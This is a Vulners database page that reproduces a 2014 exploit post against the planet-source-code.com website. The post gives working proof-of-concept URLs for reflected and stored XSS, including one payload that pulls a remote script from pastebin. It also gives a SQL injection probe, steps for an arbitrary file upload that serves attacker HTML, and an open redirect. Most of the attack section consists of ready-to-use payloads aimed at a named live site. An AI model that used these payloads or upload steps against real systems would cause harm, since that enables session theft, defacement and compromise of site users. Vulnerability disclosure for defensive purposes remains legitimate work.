Vulners
Lucene search
Planet Source Code XSS / SQL Injection / Shell Upload
`#Title : Planet Source Code - Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 15 November 2014
#Category : Web Applications
#Vendor : http://planet-source-code.com
#Greetz : newbie-security.or.id | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets
============================================================================================
Remote Cross Site Scripting
Location : vb/scripts/BrowseCategoryOrSearchResults.asp
Parameter : txtCriteria
Reference : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
POC :
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=[XSS+BYPASS_FILTERING]
Example :
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria="><SCRIPT/SRC="http://pastebin.com/raw.php?i=sUHjCcQ1"></SCRIPT>
===========================================================================================
Stored Cross Site Scripting
POC :
1. You Must Register or Login to Planet-Source-Code
2. After Login, Go to Link :
http://planet-source-code.com/vb/jobs/PostJob.asp?lngWId=8
Input your Script Cross Site Scripting at Textbox Job Title,Company,Description
3. View your Cross Script Scripting at :
http://planet-source-code.com/vb/jobs/ListJobs.asp
=============================================================================================
Cross Site Scripting
Location : vb/scripts/voting/VoteLog.asp
Parameter : txtCodeName
POC :
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=[YOUR_XSS]&txtCodeId=9431&intNumOfUserRatings=0
Example :
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=<script>alert("DevilScreaM")</script>&txtCodeId=9431&intNumOfUserRatings=0
===============================================================================================
Possible SQL Injection
Location : vb/jobs/ListJobs.asp
Parameter : txtMaxNumberOfEntriesPerPage
POC :
http://planet-source-code.com/vb/jobs/ListJobs.asp?txtMaxNumberOfEntriesPerPage=10'
================================================================================================
Arbitrary File Upload
POC :
1. You Must Register or Login to Planet Source Code
2. After Login, Go to Link
http://planet-source-code.com/vb/authors/new_author_login.asp?lngWId=1&blnExisistingAuthor=TRUE
3. Upload your File TXT or HTML in Upload Button
4. After Upload File, see your file at :
http://planet-source-code.com/Upload_PSC/AuthorPhotos/[RANDOME_NAME].html
Example :
http://planet-source-code.com/Upload_PSC/AuthorPhotos/AUTHOR_PHOTO201411151232354597.html
=====================================================================================================
URL Redirection
POC :
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=[URL]
Example :
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=http://newbie-security.or.id/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Nov 2014 00:00Current
0.5Low risk
Vulners AI Score0.5